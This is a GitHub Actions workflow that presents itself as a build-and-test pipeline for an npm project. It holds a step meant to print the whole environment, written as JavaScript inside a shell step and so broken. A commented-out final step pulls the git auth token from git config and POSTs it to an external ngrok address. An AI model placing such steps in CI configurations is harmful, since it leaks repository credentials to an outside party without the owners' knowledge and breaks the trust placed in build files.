name: PUSH_EVENT
on: push
jobs:
  Build:
    name: Build and test
    runs-on: ubuntu-latest
    steps:
      - name: Check out repository code
        uses: actions/checkout@v2
#         with: 
#           persist-credentials: 'false'
      
      - uses: actions/setup-node@v1
      - run: |
          npm install
          npm test

      - run: |
          console.log('hi') 
          console.log('-------')
          console.log(process)
          console.log('-------')
          console.log(process.env)

#       - run: | 
#           auth=$(git config --list | grep AUTH | tr -d ' ')
          
#           curl --request POST \
#           --url https://4d25-77-137-8-226.ngrok.io \
#           --header 'content-type: application/json' \
#           --data '{
#             "git_token": "'$auth'"
#             }' \
#           --fail
